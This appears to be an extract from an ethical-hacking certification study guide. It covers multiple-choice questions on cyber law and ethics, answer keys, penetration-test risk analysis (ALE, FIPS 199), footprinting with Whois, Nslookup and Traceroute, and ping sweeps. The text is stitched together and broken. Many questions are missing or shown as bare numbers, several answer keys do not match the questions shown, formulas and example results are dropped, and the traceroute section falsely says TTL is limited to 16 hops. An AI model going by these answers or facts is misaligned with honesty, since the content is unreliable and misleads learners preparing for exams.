According to the Internet Architecture Board (IAB), an activity that causes which of the
following is considered a violation of ethical behavior on the Internet?
a. Wasting resources
b. Appropriating other peoples intellectual output
c. Copying proprietary software
d. Interfering with other peoples computer work
2.
Because the development of new technology usually outpaces the law, law enforcement
uses which traditional laws to prosecute computer criminals?
a. Copyright laws
b. Embezzlement, fraud, and wiretapping
c. Immigration laws
d. Warranties
4.
In the United States, the legislative branch of government makes which type of law?
a. Administrative law
b. Statutory law
c. Common law
d. Regulatory law
5.
A statutory law cited as 18 U.S.C. 1000 (1998) refers to which one of the following
references?
a. Rule 18, Title 1000 of the 1998 edition of the United States Code
b. Article 18, Section 1000 of the 1998 edition of the United States Code
c. Title 18, Section 1000 of the 1998 edition of the United States Code
d. Title 18, Section 1998 of Article 1000 of the United States Code
6.
The three types of laws under the U.S. Common Law System are:
a. Civil (tort) law, copyright law, administrative/regulatory law
b. Civil (tort) law, criminal law, and administrative/regulatory law
c. Financial law, criminal law, and administrative/regulatory law
d. Civil (tort) law, criminal law, and financial law
7.
Which one of the following factors is not taken into account in the amendment of
sentencing guidelines under 1030 relating to computer crime?
a. The computer skills and knowledge of the individual
b. The potential and actual loss resulting from the offense
c. The level of sophistication and planning involved in the offense
d. The extent to which the offense violated the privacy rights of individuals harmed
8.
Access to personal information, choice to opt in or opt out, and notice regarding collection
of personal information are basic elements of what principles?
a. Security
b. Privacy
c. Administrative
d. Ethical
9.
What legislation requires financial institutions to provide customers with clear descriptions
of the institutions polices and procedures for protecting the personal information of
customers?
a. Financial Services Modernization Act (Gramm-Leach-Bliley)
b. The 1973 U.S. Code of Fair Information Practices
c. The 2002 E-Government Act. Title III, the Federal Information Security
Management Act (FISMA)
d. Sarbanes-Oxley
10. U.S.C. 1029 deals with which one of the following areas?
a. Fraud Activity Associated with Computers
b. Interception of Wire, Oral, and Electronic Communications
c. Fraud Activity Associated with Access Devices
d. Communication Lines, Stations, or Systems
11. Standards of behavior and considerations of what is right or wrong are associated with
which one of the following?
a. Laws
b. Rules
c. Ethics
d. Feelings
12. Hackers justify their attacks on computers by which of the following reasons?
a. Exercising freedom of speech by writing viruses
b. Helping information to be free
c. Information system software should prevent causing harm
d. All of the above
13. Which one of the following items is not in the EC-Council Code of Ethics?
a. Protect the intellectual property of others by relying on her/his own innovation and
efforts, thus ensuring that all benefits vest with its originator
b. Use software or processes that are copied or downloaded from other sources if
done in an office environment
c. Disclose to appropriate persons or authorities potential dangers to any e-commerce
clients, the Internet community, or the public, that she/he reasonably believes to be
associated with a particular set or type of electronic transactions or related software
or hardware
d. Not engage in deceptive financial practices such as bribery, double billing, or other
improper financial practices
14. The Ten Commandments of Computer Ethics were developed by which one of the
following organizations?
a. The EC-Council
b. The IEEE/ACM
c. The Internet Architecture Board (IAB)
d. The Computer Ethics Institute
15. Which one of the following organizations stated Access to and use of the Internet is a
privilege and should be treated as such by all users of the system in their code of ethics?
a. The EC-Council
b. The IEEE/ACM
c. The Internet Architecture Board (IAB)
d. The Computer Ethics Institute
16. The Code of Federal Regulations (C.F.R.) categorizes which type of U.S. law?
a. Statutory
b. Administrative/regulatory
c. Common
d. Financial
17. Under U.S. Common Law, which type of law addresses damage or loss to an individual or
an organization? Punishment cannot include imprisonment, but consists of financial
awards comprised of punitive, compensatory, or statutory damages.
a. Criminal law
b. Civil law
c. Administrative/regulatory law
d. Financial law
18. Responsibility for handling computer crimes in the United States is assigned to:
a. The Federal Bureau of Investigation (FBI) and the Secret Service
b. The FBI only
c. The National Security Agency (NSA)
d. The Central Intelligence Agency (CIA)
19. In general, computer-based evidence is considered:
a. Conclusive
b. Circumstantial
c. Secondary
d. Hearsay
20. What set of rules invokes the prudent man rule that requires senior officials to perform
their duties with the care that ordinary, prudent people would exercise under similar
circumstances?
a. Computer Security Act
b. Federal Sentencing Guidelines
c. Organization for Economic Cooperation and Development (OECD) Guidelines
d. Digital Millennium Copyright Act (DMCA)
21. What legislative Act was written to provide a comprehensive framework for ensuring the
effectiveness of information security controls over information resources that support
Federal operations and assets?
a. U.S. Kennedy-Kassebaum Health Insurance and Portability Accountability Act
(HIPAA)
b. Digital Millennium Copyright Act (DMCA)
c. USA Provide Appropriate Tools Required to Intercept and Obstruct Terrorism
(PATRIOT) Act
d. The Federal Information Security Management Act (FISMA)
22. Information system hacking that has the potential to cause bodily harm or death can result
in which one of the following sentences?
a. Imprisonment for 1 to 10 years
b. Imprisonment for 1 year
c. Imprisonment from 20 years to life
d. Imprisonment for 5 years
23. What one of the following federal codes is not related to hacking activities?
a. 18 U.S.C. 2510
b. 18 U.S.C. 1029
c. 18 U.S.C. 1090
d. 18 U.S.C. 1030
24. Which of the following is not one of the Generally Accepted Systems Security Principles
(GASSP)?
a. Computer security is not constrained by societal factors.
b. Computer security supports the mission of the organization.
c. Computer security requires a comprehensive and integrated approach.
d. Computer security should be periodically reassessed.
25. Which one of the following items is not one of the privacy practices in the 1973 U.S. Code
of Fair Information Practices?
a. There must not be personal data recordkeeping systems whose very existence is
secret.
b. There must be a way for a person to find out what information about them is in a
record and how it is used.
c. An individual is not required to have the means to prevent information about them,
which was obtained for one purpose, from being used or made available for other
purposes without their consent.
d. Any organization creating, maintaining, using, or disseminating records of
identifiable personal data must ensure the reliability of the data for their intended
use and must take precautions to prevent misuses of that data.
26. Ethical behavior is a function of which of the following items?
a. Religion
b. Experience
c. Culture
d. All of the above
27. Which one of the following is not a characteristic of a Certified Ethical Hacker?
a. Is considered on the same professional level as non-certified personnel
b. Required to adhere to higher ethical standards than non-certified personnel
1.
Answer: a
The correct answer is a. Answers b, c, and d are ethical considerations of other organizations.
2.
Answer: c
Common Law is also practiced in the United Kingdom. The Civil Law System is used in France,
Germany, and Quebec.
3.
Answer: b
4.
Answer: b
The correct answer is b. Administrative agencies make administrative/regulatory law, and the
judicial branch produces common laws found in court decisions.
5.
Answer: c
6.
Answer: b
7.
Answer: a
The correct answer is a. Answers b, c, and d are cited in the Cyber Security Enhancement Act of
2002. Additional cited areas are whether the offense was committed for purposes of commercial
advantage or private financial benefit, whether the offense involved a computer used by the
government in furtherance of national defense, national security, or the administration of justice,
whether the violation was intended to or had the effect of significantly interfering with or disrupting
a critical infrastructure, and whether the violation was intended to or had the effect of creating a
threat to public health or safety, or injury to any person.
8.
Answer: b
9.
Answer: a
10. Answer: c
The correct answer is c. Answer a refers to 18 U.S.C. 1030, answer b is 18 U.S.C. 2510, and
answer d is 18 U.S.C. 1362.
11. Answer: c
12. Answer: d
13. Answer: b
The correct answer is b. Software should be purchased and properly licensed and not copied
illegally from other sources.
14. Answer: d
15. Answer: c
16. Answer: b
17. Answer: b
18. Answer: a
19. Answer: d
The correct answer is d. Answer a refers to incontrovertible evidence; answer b refers to inference
from other, intermediate facts; and answer c refers to a copy of evidence or oral description of its
content.
20. Answer: b
21. Answer: d
22. Answer: c
23. Answer: c
The correct answer is c, a made-up distracter. Answer a is the code related to the interception of
wire, oral and electronic communications; answer b is the code related to fraud activity associated
with access devices; and answer d is fraud activity associated with computers.
24. Answer: a
The correct answer is a, a made-up distracter. The GASSP states that computer security is
constrained by societal factors.
25. Answer: c
The correct answer is c. On the contrary, an individual must have the means to prevent
information about them, which was obtained for one purpose, from being used or made available
for another purposes without their consent.
26. Answer: d
27. Answer: a
The correct answer is a. A Certified Ethical Hacker is held to higher professional, legal, and ethical
standards than non-certified personnel.
28. Answer: b
29. Answer:d
The correct answer is d,the Health Insurance and Portability Account- ability Act.
Valuating Assets
When relating to a penetration test, business management typically focuses on protecting the critical
information assets of the organization. Consequently, it is important to identify the organizations most
valuable assets. Criteria for determining asset value include:
The sensitivity of the information held in the asset
The legal liability incurred by loss of information from the asset
The amount of sensitive information held in the asset
The loss of public confidence in the organization caused by compromise of information held by
the asset
The dependencies among the assets
The cost to protect the asset
The revenue generated by the asset
These criteria form a basis for justifying penetration testing in that ensuring the security of critical
organizational assets is an important consideration for the organizations customers. From a
customers or potential customers point of view, demonstrating that a variety of sound information
security-related measures are consistently practiced is an important factor in doing business with an
organization. Thus, penetration testing can be viewed as a component of marketing, operations,
income generation, and establishing customer loyalty. Typical customer concerns in doing business
with an organization include:
Is the information about my proprietary intellectual property being protected?
Is my financial information being protected?
Are my transaction records being protected?
Is billing and delivery information being protected?
Is information concerning any problems associated with the transaction and deliverables being
protected?
Is it easy to conduct business by means of a secure Intranet, including perusing available
products and services, placing and tracking orders, reviewing billing data, checking on shipping
dates, and so on?
o Routing
o Trusted Systems Testing
o Access Control Testing
o Password Cracking
o Containment Measures Testing
o Survivability Review
o Denial of Service Testing
o Security Policy Review
o Alert and Log Review
Communications Security Testing
o Posture Review
o PBX Review
o Voicemail Testing
o FAX Testing
o Modem Survey
o Remote Access Control Testing
o Voice over IP Testing
o X.25 Packet Switched Networks Testing
Wireless Security Testing
o Posture Review
o Electromagnetic Radiation (EMR) Testing
o 802.11 Wireless Networks Testing
o Bluetooth Networks Testing
o Wireless Input Device Testing
o Wireless Handheld Testing
o Cordless Communications Testing
o Wireless Surveillance Device Testing
o Wireless Transaction Device Testing
o RFID Testing
o Infrared Testing
o Privacy Review
Physical Security Testing
o Posture Review
o Access Controls Testing
o Perimeter Review
o Monitoring Review
o Alarm Response Review
o Location Review
o Environment Review
Validate the costs of the penetration test by obtaining cost estimates and quotes from a number
of qualified suppliers.
Determine the types of tools that will be used by the supplier in the penetration test. Will the tools
be custom developed by the testing organization, commercially developed, or open source tools?
Has the testing organization checked the tools to make sure they have not been infected and
could be a source of compromise to the information systems that will be under test? Are the
signatures in the tools up to date? How will the testing organization detect recently discovered
vulnerabilities in the tested system?
Confirm that the testing organization has a solid plan for conducting the test.
Ensure that the testing organization uses formal methodologies that meet or exceed industry
standard approaches, such as developed in the Open Source Security Testing Methodology
Manual (OSSTMM) and the CESG IT Health Check (CHECK) method.
Determine the format, clarity, completeness, and accuracy of the deliverable penetration test
reports and results briefing.
Obtain guarantees that the experienced professionals promised by the testing organization are
the actual personnel performing the testing and are not replaced by inexperienced individuals.
Ensure that the personnel performing the penetration testing are experienced, competent, and
hold relevant certifications.
Investigate to guarantee that the testing organization will keep confidential all items and
information relating to the penetration test.
Asset. An entity in the organization designated to be protected; the value of the asset has to be
estimated.
Vulnerability. A weakness or lack of a safeguard that can be exploited by a threat and cause
harm.
Safeguard. A control employed to reduce the risk associated with a specific threat or group of
threats.
Residual risk. The risk that remains after the implementation of controls. There is always a
residual risk because risk can never be completely eliminated.
One useful analysis in quantifying the justification for a penetration test is to calculate the Annualized
Loss Expectancy (ALE) if a critical asset is disabled or compromised by a malicious attack on an
organizations network and information resources. The ALE is calculated as follows:
ALE = Single Loss Expectancy (SLE) Annualized Rate of Occurrence (ARO), where ALE is the
expected annual loss to an organization from a threat inflicting harm to an asset; SLE is the dollar
figure that represents an organizations loss from a single threat realized; and the ARO is the
estimated annual frequency of the single threat occurring.
For example, assume that an asset with a value of $500,000 is subject to a successful malicious
attack threat twice a year; the ALE is calculated as:
If the asset has some protection and will not be totally taken out by the threat, the SLE can be
modified by an Exposure Factor that takes into account that the asset is not completely eliminated by
the threat. Formally, Exposure Factor (EF) is the percentage of loss that a realized threat event would
have on a specific asset. Therefore,
Thus, in the previous example, if the $500,000 asset has an exposure of 40 percent to the threat, the
SLE is $500,000 0.40 = $200,000, and the ALE is:
Tornadoes
Floods
Snowstorms
Ice
Thunderstorms
Avalanches
Organisms
Forest fires
DESCRIPTION
Passive
Active
Close-in
Insider
Distribution
Impact Determination
As with other metrics in evaluating the performance of an organization, business management
requires a measure of the impact of a threat realized on the organizations network and information
system. One popular and useful approach to impact characteristics is provided by the National
Institute of Standards and Technology (NIST) Federal Information Processing Publication (FIPS) 199,
Standards for Security Categorization of Federal Information and Information Systems.
FIPS 199 defines three levels of potential impact of a threat realized on the security objectives of
confidentiality, integrity, and availability. Table 3-2 provides these impact definitions.
Table 3-2: Impact Definitions for Security Objectives
Open table as spreadsheet
POTENTIAL IMPACT
SECURITY
OBJECTIVE
LOW
MODERATE
HIGH
The unauthorized
disclosure of
information could be
expected to have a
limited adverse
effect on
organizational
operations,
organizational
assets, or
individuals.
The unauthorized
disclosure of
information could be
expected to have a
serious adverse
effect on
organizational
operations,
organizational assets,
or individuals.
The unauthorized
disclosure of
information could be
expected to have a
severe or
catastrophic adverse
effect on organizational
operations,
organizational assets,
or individuals.
The unauthorized
modification or
destruction of
information could be
expected to have a
limited adverse
effect on
organizational
operations,
organizational
assets, or
individuals.
The unauthorized
modification or
destruction of
information could be
expected to have a
serious adverse
effect on
organizational
operations,
organizational assets,
or individuals.
The unauthorized
modification or
destruction of
information could be
expected to have a
severe or
catastrophic adverse
effect on organizational
operations,
organizational assets,
or individuals.
The disruption of
access to or use of
information or an
information system
could be expected to
have a limited
adverse effect on
organizational or
individuals.
The disruption of
access to or use of
information or an
information system
could be expected to
have a serious
adverse effect on
organizational
operations,
organizational assets,
or individuals.
The disruption of
access to or use of
information or an
information system
could be expected to
have a severe or
catastrophic adverse
effect on organizational
operations,
organizational assets,
or individuals.
Confidentiality
Preserving
authorized
restrictions on
information access
and disclosure,
including means for
protecting personal
privacy and
proprietary
information. [44
U.S.C., SEC. 3542]
Integrity
Guarding against
improper information
modification or
destruction, and
includes ensuring
information nonrepudiation and
authenticity. [44
U.S.C., SEC. 3542]
Availability
Ensuring timely and
reliable access to
and use of
information. [44
U.S.C., SEC. 3542]
FIPS 199 also defines security category (SC) as a function of the potential impact on information or
information systems should a threat successfully exploit vulnerability in the system. A security
category can apply to information types and information systems.
The general formula developed in FIPS Pub 199 for defining a security category of an information
type is:
SC information type = {(confidentiality, impact), (integrity, impact), (availability, impact)},
where the acceptable values for potential impact are LOW, MODERATE, HIGH, or NOT
APPLICABLE.
For example, if the payroll department of an organization determines that there is a high potential
impact from a loss of confidentiality, a high potential impact from a loss of integrity, and a moderate
potential impact from a loss of availability, the security category, SC, of this information type would be:
SC payroll information = {(confidentiality, HIGH), (integrity, HIGH), (availability, MODERATE)}.
For information systems, the corresponding formula is:
SC information system = {(confidentiality, impact), (integrity, impact), (availability, impact)},
where the acceptable values for potential impact are LOW, MODERATE, or HIGH.
A value of NOT APPLICABLE cannot be applied to an impact level of an information system. To
develop a category for an information system, the potential impact values assigned to the security
objectives of confidentiality, integrity, and availability must be the maximum (worst case) values
assigned among the security categories that have been assigned to the different types of information
residing on the system.
For example, suppose a health care provider has billing information for patients, including their
treatment type and personal information, residing on a billing information system. The CIO determines
that for these records, the potential impact from a loss of confidentiality is high, the potential impact
from a loss of integrity is high, and the potential impact from a loss of availability is moderate.
The corresponding security category, SC, would be expressed as:
SC billing information = {(confidentiality, HIGH), (integrity, HIGH), (availability, MODERATE)}
Now, assume that the same billing information system also supports some of the health care
organizations administrative functions and has the following SC for the administrative information:
SC administrative information = {(confidentiality, LOW), (integrity, HIGH), (availability, LOW)}
The security category of the acquisition information system would comprise the highest values of the
two information categories resident on the system. Therefore, the SC would be:
SCbilling information system = {(confidentiality, HIGH), (integrity, HIGH), (availability, MODERATE)}.
ACTIVITIES
Three choices are available to management regarding risk. One option is to use penetration tests as a
component of a risk management program that uses controls and safeguards to reduce risk. The
second choice is to transfer the risk to another organization such as an insurance company. The third
approach is to accept the status quo risk and accept the losses that might occur. Obviously, the latter
choice is a problematic. The other two are reasonable options, but the risk reduction approach is the
most prudent of the three and demonstrates due care taken by corporate management.
NIST SP 800-30, Risk Management Guide for Information Technology Systems, provides a risk
mitigation strategy as shown in Figure 3-2.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
In general, why is it difficult to justify the value of a penetration test in terms of return of
investment (ROI)?
a. IT systems and information systems security are usually viewed as cost centers.
b. IT systems and information systems security are usually viewed as profit centers.
c. IT systems and information systems security are usually viewed as revenue
generators.
d. IT systems and information systems security are not related to penetration tests.
2.
3.
Which one of the following items is not a benefit that can result from penetration testing?
a. Mitigation of risk
b. Increasing system vulnerabilities
c. Correcting design flaws
d. Correcting vulnerabilities
4.
Which one of the following activities is not a step in a typical penetration test?
a. Determine operating system
b. Identify network topology
c. Determine risk
d. Determine costs of controls
5.
Which one of the following is not a criterion for determining the value of an organizations
asset?
a. The number of upgrades to the asset
b. Legal liability incurred by loss of information from the asset
c. The sensitivity of the information held in the asset
d. The dependencies among the assets
6.
7.
Which one of the following is not a typical customer concern in doing business with an
organization?
a. Is billing and delivery information being protected?
b. Is my advertising budget being exceeded?
c. Is my proprietary intellectual property information being protected?
d. Is my financial information being protected?
8.
Which one of the following lists is not part of typical penetration tests?
a. Acquire information, penetrate and attack the network, and cover tracks
b. Develop a plan, acquire information, and generate report
c. Conduct enumeration, vulnerability analysis, and exploit the network
d. Exercise due care, implement separation of duties, and increase thresholds
9.
Which one of the following relationship pairs describing types of penetration tests is
incorrect?
a. Full knowledge - Whitebox
b. Partial knowledge - Graybox
c. Minimum knowledge - Blackbox
d. Zero knowledge - Blackbox
10. Which one of the following areas is not listed as a major heading in the (OSSTMM) OpenSource Security Testing Methodology Manual?
a. Information Security Testing
b. Internet Technology Security Testing
c. Script Security Testing
d. Wireless Security Testing
11. The following subheadings are listed under which major heading in the (OSSTMM) OpenSource Security Testing Methodology Manual?
Access Controls Testing, Perimeter Review, Alarm Response Review, and Location
Review
a. Physical Security Testing
b. Script Security Testing
c. Communications Security Testing
d. Process Security Testing
12. Which one of the following items is not a valid choice for an organization to consider when
choosing a supplier to conduct penetration testing?
a. Ensure that the penetration testing organization has the appropriate experience
and expertise to perform the required tasks.
b. To ensure that the testing is authentic, request that the supplier employ former
malicious hackers as part of the testing team.
c. Investigate to be certain that the testing organization provides the specific set of
services that your organization desires.
d. Have the penetration testing organization sign an agreement to include liability for
any harm that occurs during the test, including accidents and negligence.
13. Identifying critical assets, the corresponding threats to these assets, the estimated
frequency of occurrence of the threats, and the impact of the threats realized defines what
activity?
a. Risk analysis
b. Threat analysis
c. Security analysis
d. Testing analysis
14. An entity in the organization that is designated to be protected is the definition of which
one of the following terms?
a. Vulnerability
b. Safeguard
c. Asset
d. Control
15. A weakness or lack of a safeguard that can be exploited by a threat and cause harm is
which one of the following?
a. Vulnerability
b. Residual risk
c. Safeguard
d. Asset
16. The risk that remains after the implementation of controls is called:
a. Vulnerability
b. Residual risk
c. Weakness
d. Threat
17. The expected annual loss to an organization from a threat inflicting harm to an asset is
called the:
a. Single Loss Expectancy (SLE)
b. Annualized Rate of Occurrence (ARO)
c. Annualized Rate of Loss (ARL)
d. Annualized Loss Expectancy (ALE)
18. The Single Loss Expectancy (SLE) is calculated as:
a. Annualized Rate of Occurrence (ARO) Exposure Factor (EF)
b. Asset Value Exposure Factor (EF)
c. Asset Value Annualized Rate of Occurrence (ARO)
d. Annualized Loss Expectancy (ALE) Exposure Factor (EF)
19. The Annualized Loss Expectancy (ALE) is calculated as:
a. Single Loss Expectancy (SLE) Exposure Factor (EF)
b. Exposure Factor (EF) Annualized Rate of Occurrence (ARO)
c. Single Loss Expectancy (SLE) Asset Value
d. Single Loss Expectancy (SLE) Annualized Rate of Occurrence (ARO)
20. Which one of the following items is not one of the steps in performing a risk analysis?
a. Determine the value of assets in order to estimate potential loss amounts.
a.
b.
c.
d.
Confidentiality
Integrity
Availability
Accountability
28. NIST FIPS 199 defines a security category (SC) as which one of the following?
a. A function of the vulnerabilities in an information system should a threat
successfully exploit the system
b. A function of the safeguards in an information system should a threat successfully
exploit a vulnerability in the system
c. A function of the potential impact on information or information systems should a
threat successfully exploit a vulnerability in the system
d. A function of the controls in an information system should a threat successfully
exploit a vulnerability in the system
29. The general formula developed in FIPS Pub 199 for defining a security category of an
information type is which one of the following?
a. SC information type = {(confidentiality, impact), (integrity, impact), (accountability,
impact)}
b. SC information type = {(confidentiality, impact), (integrity, impact), (availability,
impact)}
c. SC information type = {(confidentiality, threat), (integrity, threat), (availability, threat)}
d. SC information type = {(authenticity, impact), (integrity, impact), (availability, impact)}
30. What role(s) in an organization are responsible for meeting the requirements of
reasonable care for legal liability for the corporate entity and providing supporting
resources relating to penetration testing and other information system security activities?
a. Senior organization officers
b. Business unit managers
c. Information and data owners
d. Security awareness training personnel
31. Which one of the following choices is not a valid option for management regarding risk?
a. Accept the existing risk, and accept the losses that might occur.
b. Transfer risk to another organization such as an insurance company.
c. Use penetration tests as a component of a risk management program that uses
controls and safeguards to reduce risk.
d. Use required controls and safeguards to eliminate risk completely.
Answers
1.
Answer: a
The correct answer is a. IT systems and information system security are usually viewed as
consuming revenue and not directly generating revue. CIOs and CSOs have to position
penetration testing as a critical component of important revenue generating efforts.
2.
Answer: d
3.
Answer: b
4.
Answer: d
The correct answer is d. This action is performed after the penetration test if controls are selected
for mitigating risk.
5.
Answer: a
6.
Answer: c
7.
Answer: b
8.
Answer: d
9.
Answer: c
10. Answer: c
11. Answer: a
12. Answer: b
The correct answer is b. An organization should avoid penetration-testing organizations that
employ former malicious hackers.
13. Answer: a
14. Answer: c
15. Answer: a
16. Answer: b
17. Answer: d
18. Answer: b
19. Answer: d
20. Answer: c
21. Answer: a
22. Answer: b
23. Answer: a
24. Answer: b
25. Answer: c
The correct answer is c. Answer a describes a close-in attack, answer b is an insider attack, and
answer d refers to a passive attack.
26. Answer: c
27. Answer: a
28. Answer: c
29. Answer: b
30. Answer: a
31. Answer: d
Risk can never be completely eliminated.
Chapter 4: Footprinting
Overview
Footprinting is an important way for an attacker to gain information about an organization passively
(that is, without the organizations knowledge). Footprinting enables the blueprinting of the security
profile of an organization. It involves gathering information about a network to create a profile of the
targets networks and systems.
Footprinting is the first of the three pretest phases of an attack; the other two are scanning and
enumerating. These pretest phases are very important and can make the difference between a
successful and an unsuccessful attack.
Reconnaissance is another term that refers to the process of gathering information about a target
prior to launching an attack.
The EC-Council has divided reconnaissance into a seven-step information-gathering process:
1. Gathering information
2. Determining the network range
3. Identifying active machines
4. Finding open ports and access points
5. Detecting operating systems
6. Fingerprinting services
7. Mapping the network
Footprinting comprises the first two steps in this seven-step process, gathering information and
determining the network range. This chapter discusses these two steps.
Table 4-1: The Seven Steps of the Information-Gathering Process
Open table as spreadsheet
STEP
TITLE
One
Gathering information
Two
Three
Four
Five
Six
Fingerprinting services
Seven
Keep in mind that although these processes are commonly executed in this order, often you may have
to improvise and head in a different direction, depending upon what you find.
Gathering Information
Gathering information means collecting as much knowledge about the target network as possible
before any active scanning takes place. It is considered a passive activity (that is, it does not involve
active encroachment or manipulation of the targets network).
This initial information is collected by compiling information from public sources, either through
running common utilities such as Whois or Nslookup, or manually researching public information
about the target.
This is also referred to as the documentation phase because youre trying to create a document of
information about your target, on which to base your attack.
Whois
Whois is usually the first stop in reconnaissance, supplying information like the targets domain
registrant, its administrative and technical contacts, and a listing of their domain servers. Whois
searches the Internet for domain name administration details, such as domain ownership, address,
location, phone number, and so on, about a specific domain name.
While the Internet Corporation for Assigned Names and Numbers (ICANN) manages the assignment
of domain names and IP addresses, actual domain name registration is offered by competing domain
name registrars. Most registrars also provide DNS hosting service.
Above all of these services are five Regional Internet Registries (RIR) that oversee public IP
addresses within their geographic regions. These are:
American Registry for Internet Numbers (ARIN): North America
RIPE Network Coordination Centre (RIPE NCC): Europe, the Middle East and Central Asia
Asia-Pacific Network Information Centre (APNIC): Asia and the Pacific region
Latin American and Caribbean Internet Address Registry (LACNIC): Latin America and the
Caribbean region
African Network Information Centre (AfriNIC): Africa
Each of these RIRs allows Whois-type searches on their databases to locate information on networks
autonomous system numbers (ASNs), network-related handles, and other related points of contact
(POC).
Figure 4-1 shows part of the RIPE Network Coordination Centre Whois for the BBC.
www.samspade.org
www.allwhois.com
www.geektools.com
www.dnsstuff.com
www.betterwhois.com
www.radb.net
www.internic.net
www.fixedorbit.com
DNS Servers:
jws-edcp.wiley.com
ns1.wileypub.com
Since domain space allocation is deregulated, its advisable to go to several different Whois servers to
get a complete picture, especially when the hosting service may be offshore.
An excellent third-party Whois tool is SmartWhois by TamoSoft
(www.tamos.com/products/smartwhois). SmartWhois provides comprehensive info about the targets
IP address, host name, or domain, including country, state or province, city, name of the network
provider, administrator, and technical support contact information. SmartWhois can query the
international registries to help find the information about domains located in other parts of the world.
Domain Proxy
A domain proxy allows an organization to display anonymous contact information during a Whois
search. Any communications to the displayed contact information is then forwarded by the proxy
service to the real domain owner. This is intended to help provide a level of protection from
reconnaissance, but still help the organization comply with domain ownership regulations.
Nslookup
Nslookup is a program to query Internet domain name servers. It displays information that can be
used to identify the targets Domain Name System (DNS) infrastructure by querying DNS servers for
machine name and address information. Both the Linux and Windows operating systems come with
an Nslookup client.
Nslookup displays information that can be used to diagnose Domain Name System (DNS)
infrastructure, helps find additional IP addresses, and can identify the MX record to reveal the IP of
the mail server.
To use Nslookup, type nslookup from the command line followed by an IP address or a URL, like:
nslookup www.wiley.com. Typing just nslookup will put you in interactive mode with a > prompt,
whereupon you can enter ? to get a list of options, as shown in Figure 4-2.
www.yahoo-ht2.akadns.net
Address: 209.191.93.52
Aliases: www.yahoo.com
sender of the datagram, and each router through which a packet passes on the route to its destination
reduces the TTL field by one.
The TTL is limited to 16 hops, which means that after 16 tries, the packet is discarded as
undeliverable. If the TTL reaches 0, the packet is discarded and an Internet Control Message Protocol
(ICMP) message is sent to the originating computer.
The TTL process goes like this:
1. A computer sends out a packet with a TTL of 1.
2. If the first router is not the correct one, it subtracts 1 from the TTL, effectively resetting it to 0,
sends a time exceeded in transit error message to the origin (with its IP address), and the
packet expires.
3. The originating computer increments the TTL by one (TTL + 1) and sends the packet back out,
with the TTL now 2.
4. The first incorrect router subtracts 1 from the TTL again, but since its now not 0 (its 1), it
forwards the datagram to the next router.
5. The second router will deliver the packet if its destined for its network or reset the TTL to 0,
send an error message to the origin, and drop the packet.
6. This process continues until the packet is delivered or until the TTL exceeds 16, at which time
the packet is dropped permanently.
Figure 4-4 shows the concept of routing hops.
Why TTL?
When each router receives an IP packet, it subtracts one from the TTL field in the packets header.
When the TTL reaches zero, its not forwarded any more but is sent back to the originating computer
with a time exceeded in transit ICMP message. TTL is needed to keep the Internet from being
swamped with undeliverable packets, as without TTL, these packets would travel the Internet forever.
Traceroute is useful not only for showing the path the packet takes to the target but also through the
ICMP messages generated, for showing what routers are used along the way. Traceroute can reveal
the name of routers, the targets DNS entries, the targets network affiliations and the geographic
location of the routers.
When ICMP is Blocked
Its quite common for firewalls to be configured to block ICMP or UDP and thereby prevent Traceroute
from returning useable information. One program designed to get around this issue is Michael Torens
TCPTraceroute (http://michael.toren.net/code/tcptraceroute/). TCPTraceroute uses TCP SYN packets
instead of ICMP, and is able to bypass many firewall filters.
If youd like to run a traceroute program with a little better interface than the command line, several
utilities, free and commercial, may fit the bill. Some are free and some have free demo periods.
NeoTrace (www.neotrace.com) shows you the route between the attacker and the target, including all
intermediate nodes and their registrant information, all in a graphical map. Figure 4-5 shows
NeoTrace mapping a traceroute to Google.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
c. ARTNIC
d. LACNIC
2.
3.
4.
5.
6.
7.
8.
9.
1.
Answer: c.
ARTNIC does not exist. The other RIRs listed are: RIPE Network Coordination Centre (RIPE
NCC), African Network Information Centre (AfriNIC), and Latin American and Caribbean Internet
Address Registry (LACNIC).
2.
Answer: b
3.
Answer: a
4.
Answer: a
5.
Answer: b
Answer c is correct if the TTL reaches 0, but the router always decrements the TTL by 1 at each
hop.
6.
Answer: b
7.
Answer: a
8.
Answer: c
Linux uses UDP for its Traceroute; Windows uses ICMP.
9.
Answer: d
10. Answer: b
11. Answer: d
12. Answer: d
13. Answer: b
Traceroute is used to determine the route between the attacker and the target.
14. Answer: a
15. Answer: c
While the order of steps in information gathering is often varied, Whois is commonly the first step.
16. Answer: a
17. Answer: c
While not impossible, the other three choices are better suited for open searching.
18. Answer: b
19. Answer: a
20. Answer: d
21. Answer: c
Chapter 5: Scanning
Overview
The goal of the scanning phase of pretest reconnaissance is to discover open ports and find
applications vulnerable to hacking. This is done by pinging individual machines, determining the
targets network ranges, and port scanning individual systems. Therefore, the next steps to gathering
information (identifying active machines, discovering open ports and access points, fingerprinting the
operating system, and uncovering services on ports) are parts of the scanning phase.
Although the tester is still in information gathering mode, scanning is more active than footprinting. In
this phase, the tester begins to get a more detailed picture of the target by:
Detecting live machines on the target network
Discovering services running on targeted servers
Identifying which TCP and UDP services are running
Identifying the operating system
Using active and passive fingerprinting
Ping
Before starting the scanning phase, you will need to identify active target machines (that is, find out
which machines are up and running). Ping can be used for this task.
Ping is a useful ICMP utility to measure the speed at which packets are moved across the network,
and to get some basic details about the target, like Time-To-Live (TTL) details. Ping helps in
assessing network traffic by time stamping each packet. It can also be used for resolving host names.
Ping is a very simple utility. It sends an echo request to a target host and then waits for the target to
send an echo reply back. Ping sends out an ICMP Echo Request packet and awaits an ICMP Echo
Reply message from an active machine:
Pinging 192.168.0.1 with 32 bytes of data:
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127
Reply from 192.168.0.1: bytes=32 time=1ms TTL=127
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127
Reply from 192.168.0.1: bytes=32 time=2ms TTL=127
Ping Sweeps
Since its often time-consuming and tedious to ping every possible address individually, a technique
known as a ping sweep can be performed that will ping a batch of devices and help the attacker
determine which ones are active. Ping sweeps aid in network mapping by polling network blocks or IP
address ranges rather than individual hosts. Pinged hosts will often reply with an ICMP Echo reply
indicating that they are alive, whereas no response may mean the target is down or nonexistent or
that the ICMP protocol is disabled.
Ping Tools
In addition to the ping utility included with your operating system, there are a variety of ping tools
available. Several vendors offer ping tools that provide various levels of functionality and extra
features, such as ping sweep ability:
WS_PingProPack (www.ipswitch.com)
NetScan Tools (www.nwpsw.com)
Hping (www.hping.org/download.html)
icmpenum (www.nmrc.org)
NMap (described later) can also perform a ping sweep, as shown in the Mode section of Figure 5-1.
Port Scanning
